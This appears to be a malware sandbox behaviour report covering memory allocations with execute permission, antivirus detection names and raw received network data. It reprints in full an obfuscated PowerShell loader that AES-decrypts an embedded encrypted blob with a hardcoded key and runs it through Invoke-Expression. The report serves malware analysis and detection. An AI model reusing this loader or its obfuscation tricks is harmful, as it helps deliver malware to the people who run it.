process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
cmdline powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
'+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
filepath: powershell.exe
status: 1 return: 1 repeated: 0
Skyhigh BehavesLike.VBS.Dropper.dp
Symantec ISB.Downloader!gen81
Kaspersky HEUR:Trojan.Script.Generic
Kingsoft Script.Dropper.vbs.2023281
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received ¸5’6½‘ßmÿæÉtH÷ÈOtþ¸‘ÔAlFæ ‚O°8Ç­ÍÇ!5ðÿ՗›V¬B´.TñÎßï‹F!•”Š%ÔeuClŒ°0ñ‰tÁ"†þcìp:dfÕDQÁ”~¸Üª¯‚¢·wù`´F$×F’*ñ ªùàj2T´¬Y¸ŽÝxÉ)*È1 Üádr²µŠ^ß®%ˆ™÷)M ï€e!¢$¸Éã¾ )fq¹˜žMšÀɬæ]À)k±Üó“$è°Hê³é՘4’^ëãu÷ùà¾äáՌ”ƒ1¨Ð¶™\Û[]›ätÓ¢„p8œ>é/w›ÁÏᥝJ?©ºƒ_ßY‘iBÑí’ì<Û;zq}o9<<©>c ï]p¿sÓ¬ûC†R¿ ÿ̈́Ó,3‰r“é݇ŽÚI©¥,ù`eϦ¯¡½=qŸZ±á ~£¿uÚîFà='ÓÓ/á‚7×3Ä)QZ¹®ã¶֞0—r6Žù•âû"Ói ¡—ÕóÍ+ěVgxØ_&/Îæ`b–ä÷¼j+ÜéjÆãG鋍îµí›§Ó¿‡BÌ)••ÀAß{XuR*©»å òi–P^ˆ7ûç?†¹yA™Jî%{bRÆèÛX“^øÉ ¬îÜ(Öiè5zX¼:PAGæØu9ˆWkW\;²}Ë`1}ÃåXÒk›I!+êR:ØN£ï™ '1…ÓNñoXœ¨îÏ¯3²¨â—X.Iøœº!bA W¾I¥}^ D‡“É? ‹M¨œ¯–Œ×Â××I*,M+-°!@?ÍY—S¥€@ˆ£oíOëŒéuPO§X¤…DËÖ^Ýð<ëFÑÇ!¥x5ß-ïFÀ0j«í›~#¡mB,‘DªŠ„Qec˜¾N¢¤@–GQߧ¶Ñ<HI¢jû,º™¤%O¾›Jú¡´U÷ä}26î„Æçl‘µ^1_ƒ«-·¤ºsܘ¢'h x$gŒû8|¿Ó£F7jqÔzN{—ó$’K4íR{àg˽ŽÓ´ì2}A¼4º]Aˆ¨>¥ü\ഉ.ݲ8nÀàaÆ}¨Ö_-å #· ‰J„xÉGÞ¡ò8ûÍ›ín¬LÅwFª¤{íSý3?]2Gâr̬Vx^ïÙNŸjbò>鰑¸1#þ_í‡oHáŠB ;(,¿ÅñušÅ‹S=ùmb1í@ž«I Ó´C"°b9ä`!¦ÕjµSÅ7mÍü³IÐ$!lÕñ•‘dWª¥G·ÈA$tÀŽ01<JYb’ bzKÚîkÇ™¸²rC ÂІ`O'±É’ƒKDíc‚AýpQ!Ri¯Úñ9ö²–ŘP¾ØX…©»1÷öÀÌ¡fÝæ,ôÑ/› .¤°ãé‹:<LÍ*‘ÏÃ)XZœÙ>Ÿ–Œ°‚ܯBG8á77¬nød,êP‹Zâ†rC ֘ʑæñ˜âV YB‹#ßx´é­¦Û°ÃG¢VR0 ÖûdˆwM¼Èܞ:m#Y·×‡Fšk#“ÓéVW X¨Žpژ‹M Xš¢óđ6ê%F‘‰¿OHsfþ™YÐ2meäd22ÌAsð¼º[ ’aÐÖú}:9>ŸRô8Ük!C»¨é•ŒRCß,2Pmf,zü0/¦%¤4;XȖ"ÑôRËÀ¬ÔDVEò؏FÓñøæc§Ô7<T{à]±½X…qðÔOº%C7=1IcÝ8rMm¾1Ȕ »ÒG$ö²ÂŠ›ÃÑ>–(© Ž‰úÃê%fØÈã £B »éšP¹õ2š•V!C]ão•12SÓÕ)hITlÒĬþ·R½°º<jŀ`Jõ0:d ‡4z‚1÷”4&ґ¹ï‘€®›L‚–\àµ:?»>øNÕºÛíDuƒcpÒ}ÎR¶A`lõÀ@\€ÉÃím£sL^ ]CƒÓ°ÂêÀ ¼ç`ꃭŒš—®Ò}ò$h¢ ©´ß_W8»±:• µÁÀp®å$Ù5‚dZ[5ۜºçA³_1f×Hò)3Yä8Ë rD¨†ã‹F–òÏâííŽD«&™œ¨R¦öœ]õ ´D¦@†²hÓ$²Ôƒ•ugPàÀXÖՓN®A=hôÀ·žY¶b¿,²&蝂‘C¸ÄøiH¾¸ûH°0I´0èH;SÈË¢@|2ԕ%½°Ú½b*©˜^s5Q<ċHÁöæ°/¯¦PãÒzÄ¡ˆî { Õ:t*Ŗï­æv¢6Hƒ¡ôƒÛ°Àb-ˆ dW‚3»#pÌo¹¼í;†B§’G …RŒA;NI,Š‹´]ö¬'›"¶„·np{YPm&ÇPqˆØ• Æ꼆Vh]DD8+g߃…HåH̛9£ø³¤û·Žá»·¾ &)Y[p= àtM¹JÑ}…ãÓê —xUéUdà ÑÌÓ;ï¿p8Íh¾ÏkSÿ²\V5p“îz7¶†•£ƒÂ• 6æz,ÈQ=ùø¸ðý:’…Äæè/{tùãz]‹ eWÒȪ„(¨èžOø½ó‹—ž•|Ý"߈ë"¤uü]0<ï‰øÍc5ˆ@¶ÝÅa˜OT, >ª¬ö’i<Ö,ÒéwªµÞ®.x5ß<ÌúY¼³b KK:zׯ=(ï–Ü+ž˜uÐÎG ¾—:_þl²h§SLÐU_3§þ¬Ã*­ÖXc× º9l±0y¯=?õa’VQOv©ÓÿVô˜ó•*‘­òoßò¥ꊾ©þG iep´;OBfAü΁\­`tÉò…ƒŽ $ŠKƒå÷„ÿՒÚyV ÌÑUŽU'¯°?ëœb‰¥€ŽµÉìk´kÏ8ðÑÊÒQ“M´ÇÞÿVTè¥fUiÀ³ÿϏ§üß ("¬e6õoÚ±Á¥–…<ÿùtéÓüYË£œò$ÓÛ÷éÿ«^òÌê;cº_ 
:؞YG¥‹–•zü"ºžŸžNŸÃgÖ´ˆd‰Q@.âEmƒÜ€~¥:y…`ŽH“G§  ,6¨< ÿkã×¹!•âY ßƋˆÔYT[¾'¯Èâ­´J@¼ÐÕ¬ÈшÕv®ù”3rĖ®Éä~Câ°ÓHƒ™tô{yéÿ«2)¹&¶4î%Ň*»ÈçD×÷I w¾OÿoOýY ¤•cА¾Ó#~°†Yõ #C$áMÍ+ÐXÀ³þ FDZƒ;Y¦‰UP»´ÌlØVïӓù{b §–Hw£B<ܪ¤ˆ,2I"©%¡ .ê'O£s€ê™¼¥óD.(iò õ“\žÝ33\…g`X±âٚÏ÷¯žs»6œ!$ªG<s_ž,x £É'ƒƒš¾éR3)çå™J,æçéaÔE(–#! 6û HušR¡iHoÃuW™ùÝ#ÚÀ·,:æäÞ‘2ƒ´°´]Åg™“I8Dl,…àUŸåxÕØm¡öÕß ¸Äâö³0Ú·D^M¦o%¶Ú–'su ¡ê±³$ãp jTUœ‰ÎŒI#"Þ’ª_‡8¾›WjØo’Ø7pÐ(A ÕgŸžf™nÁ끬ÚÅõ¤4Ò7`†;#;È7{_ñe4­‰€ Hxº¬‰N¦P9e®kœ Å ªv½z¢äšPrQâØR²Fÿžs´`â8 ìÚۏá=F2ž¥^¿ Y‹Ð?¦1¢Äw©ÜzfqÞ]OoçœŠª¤–û^Ü*ò^ïœ$/¥PG¾Ï"À82í ÆàxÁ¨v,àsùa ÇpU?Ïë† 1^çŒä)æki[Øprij*‚ŽMàG¦bXØ¢Tà^Iݕl°SúeâÔ*FQ­¯€ÍÏå€3!R¥ékõÊ9gåGPß‘½$†?L$@;ÝÖãðÀ#ˆ ×“”Ô+Õ遡¹<²9Üzbš’$"œÑü6zá‰IH'«‰QCW‘€·–ý¿\j (ff³Í™J¾qcøU‹õȞDj#m7B}° ç’ »OE탒A°ìÇãP(¢õã¾SRQ=eÆ뽸 3‚¥µUƒì}±{e‰¡ÆL“4’?Aƒ¿†;($±¯Žhé'U,Òø¯2㘣rc†Q{¬Ñ&À«É­…Ö¼Æ Ù}ðO0Y-›wCí™Þh.ÜQfž‹SŒð¶£‚F² TiÊ°N@÷¼¦txÕ!÷r>•827¬nÚ¤þ¸„荪Z[ã€ç‚nŽi å6€'ž}±Ík£;’›•õþ™—¢‘à“ib 4<mßc+Úm üÎîÅ´»Pµn°®/Ud¾wnØY ;ŽHÚ«®.X¨ä| ?L›P«!™˜) ¹º
Data received oNé4Eý[™ú}/"–UiB.…qš0H =»à —ÒÄç¡ÄdXüó ¯s›wåÄ6ÑÝÑO5×15-ûíå*ܓØõ¬ CꐀAåAÛªÒ4|"ڞAQw’'GKr)¬°91*4ŠC³*؞ƒéï¦ŽB¥@ :œÌt-%y¨ÎHü-ó8»Ã¸ï\/Ÿl¢!-Á ÷#®4éµ<ç! §ÓÓ±K¶=’•ã¡÷ùáE6OÀtŊÚr¹Ñêl’”ÀÿLOÏ»XXk*@݀& ¤ŸÓ( ²T ;(e'ÛTÖð(B9æ¸îq& é'…º»^NJŊÿíœmkÔÅ#kš=Hm‘¬}ÖÀöö9ƒâ³$ž)©*hn ó WôÇ"Ô<þ4ºm1fà)BÀ)»æð¯ }<(ŚI嫺sß#Ëtœ0{F¥nÇá„IåŒ2£m ¥Xû‹¼1Óº0fF¢ n]¿¦ ؁GßÐ}žVm Ómì¥b¿hU›W§ ×oV[Â5E žqÛå6Û¯›~x/ÔG¬ÔÆÚvÞJ»«ßÛÐë¥*Y˜…oÅÛážìÐešr9ôçšçYéI—tg˜ÔÆÍ{}3'Á·é's"2«¨U¹ëÐV>?§ó`…õDhÿºë—Ðø¬káÛ¤<Ąô'uvÇ'–†E‘ÄjÊi wÀ¾§ŒñÂE†R¥KÅ|z¨>8Eq#»}âW êì7"—¿@ ö' ªñm‡Æ"$‘FÑÂEŽOn•™{<_ŐŒA¦kbE k²Iþ#wیwMöwM¦Ý;_¤m*£‘Û¾†ñV§Å|`•Š5%h(éCž¸tðu] Û§wâµ? 7jao´Q¼hZ(âò؅jR/ŒÓÒ7 >ïÅÈàŠÀÉðÍsG<Zi(Ò(…Û…´Î‘xV™$,ÑÌnoio§ÇÜXÆõz¾'¤ÔƆšd fÜ9ËÉ ûç„āNå…šç¦C¨•4é·O$ª–E`U¾?ë¦ Z'Õ¤JºIT¬­ª¿ž+¢ÖÍáÁ£‘”Âzýi¶²IÕŽpÜoHFøß$‡ÕC÷ˆ^êÊv/®bøS$Z©tÓU½-~ã=!Ú¶é õA½fèÊj£š+¹x5þ,|Líñ&š -)nŀÍMN¯ïXÚÞb±WW×ô¼(Ð+xYӅ;¶î'¾ìÏðM7+Ï(eUµ_‰=pâ~6£ÂãÓièI ËmàÌEÔø·‡ª’Ò€;0Üox†¥ô²Ã!¶'©ˆþ/†K­‹R±Àa•Ùš™Y‚‚zÝ°;Áõ¿í¤UY†Úx7š;䋱-† ê r»†aøPÒõôÙ<õÇVH÷‚|ÝÍé$¯}pñ m ꇒû¿å?/åžl+ǶzÝ_“÷A$åµ¶@£ñÏ<4ÚyTyz¤õ…MP¢6–ÀLmHürõ ¸Íс#xÜ·¤ ôIÿŠŽ,tӢܚi]6å5}:ôÀJU) êf¹®H rtõ$TèÄîPÛ}DX7\ã3h÷:²©=¸íðÁÜúv¤B ¶âOKÿÛˤB†>YBáŠú«pZ¯™ò­§Û®1¹+  ûÕúä¬ìeT1*R sÍ~xìPûÀΟS<ñ Ë¢)ªM:>íÅ6ž;] òðhI‚«2£­îe’hf»ùÓ34£{’o†$Ÿ×.¯;‰Jûˆõǐ03gðä%\ %€µ@Ù×Ë«ÑGFŠàÈT³]p@¾hœÑ}$Ž k¥Y®m¶r­#î¯M¿'nË´0*N˜"ۚëlôIáZ`¤ÏQÛ'„¤OÉPJÀÅX˜(‹ŒM¤x.ÛKf³~á£B€܋ÈÔΚ’© -Ž¤ŸéŠñ›×ÃT†Ú1ÙK Äck7è0:ˆŒ/d›=Ç| ˆˆm¬hŒºF­wéÀÓ,8,Y­¹ÅˁÈààp7Šn ¡†,dØ° ]V¨í{ãev¨r‡žý° 5Z£]§¥{ã£È‚2 nGlIõ6y]0é;³!ðÔÃ"N ·éŸ|ý#êg^'¦3"Ë4òªíb®¥‘TY9χ;3@I™H${çÜÿa:LŸe¼Bùjƒ#6ÌËêt¬ Ÿ³Ìx×Úh"Ö«8ð‰äžXÜÈ¡ÔD­ÔrÄî,G»gŠûU“íî›P$ É¢ Áƒ2"Q_Ä=Æk}„Ô>‹Æ>ÖF’Bѧƒjœy`úv•;A üæ'Û ö½9§ÑcÜ}Þ*ÀôŸµéäfû=æ$±Êš=’«"¨ µð9µsíŸ9Ó@A.%ÚÃáŸXý³Ë¦oð]>¦IP£‰]Ai h@ÿG>cs eèkë€IJ²y¥•…`ßFó85~•¾>9¤É¹v(ÕÜ\NsäV‘Ś⿶ô0Ÿ5œ’9µ D›ùeõ(ë!`êAï·§ë“íVpòËûd¹g`ÊðÜ¦‚ß¿LY5Ô¬€0*Á¨÷®r䓨`}[U«pXSðʕ¨Ž€ áO¿~>w³±L÷3f‘ˆïÞ±' GR$F6è×ˏʂB(5óàsŠ´Ú}.âΤ?j¿Ó=ÔI7=F> ju)§™vî_ázÂÆ] Ó±3)6¿ÃŠh¡wÔÉ2€JÞÐßßz¹e†c§@Ipþ™UüÎ7vWþ™£ŠEi$™H•½A˜p~½?<ZUt´’Яc]ý¹À«z”môç”i¶EÒÉøüòc0T—ÇõÉx݈R…‡Ã3¨Ê=+é=íšÂ8§A±±ÝGþœTi®EB¡y+ËFyà]à<-àõoV^ë^ùD’ˆn* 
ojkøyãj×`…aÉ°?KÌImee*Ìp=@“NÑZºpnÇC˜ž/ªMLÉd2D9#¹ÄÊŒ0Vç±ÉD`Ê >øtÚPn3zI’‘ÈU/Åíq/ÒIª›Í1ÜHoŸâ#§ë”œêËæBۙ‰$þ•ðÀىÑS|*¬_„öùf_ŒºTU sïˆÅ¨–(]¬ô'¶UUõ¼a¿ÌFÎêËA+ã”ç*;þðBUOB†V"Ûx&€Ã\ >Õy šÉV ªÌ Âé4èP™ÔHØ¥¶Úûáå],$C:²1³¸´Šã©X˜°}kŸÏðBé5Ë# „Ãëô-7›€>¬OI#Q@…«‘]Ž³Ü†eqm§ÒOaÛ:X›Rf+ê<Û®E¬óô±¥#ÒÀšçŽ0ïtÃg5\®,ÃÒ  £(ÄÆ¥ÄNƝ½O8Äp)f‘c`X[_|ã&ÑuÅPú±¤i”ù2 ÐÀ/ +‹Äõz8'‰Þ=0i[ãÊñí›ðÇhòyE·óÇÀâZùÖ6Ў¬ïM]vÀÊðzOÒÄís•,Oø}-ý³ÔÄÏ&Þf «N3Íxv­çñ^Tk$®ãӡ랋P®co,Ú²•ç¶`õ°O?—!jFnã<¶£W­Ñk 3; Vêz79½ Ñ˦å”5­ž˜—ŽFÓèؾÒêôºŒ /—ï'$€Ù`¼} Cƒ€Âuq…ócµ?ዏ£Ô«í”‚téÇèpòͧZe*tŠk°ûûàz´@‚´Ì<”Šg«¾B€?žkèáZ$0! º3Æk4말6žc"²°°Z瞞ÿ–z Ö𸠂ÙT*šê(`k–Ž6ó  Öyn •àô#2ćV¦:¢y+Ќj*D±žJûà^}Š¦ö‘úå|ðË´4=²²Dò+X,Ó¹Û\hóÛ! ÉïX%]Š¾ÖÛÎÞøwfÏ˜…€7¶ dGÔ‚E`;,HHmÀ°Ð¢éÐ$gŽ¤b±j60›»YÊÉ)V,­Éè0 šj¢s‘?˜¬¤²Ð>ªF&g1£<Š£o7Šh|Tjõn¡X“Òÿ±qæ†ã5&@Q˜¦F­¥haG;¾”8âûÖîŠ@åwWí™rAsY‚•6lñ9‘bWâהy·FCB¬¦ç¤rÂ5ÖìôÅÙämÌ 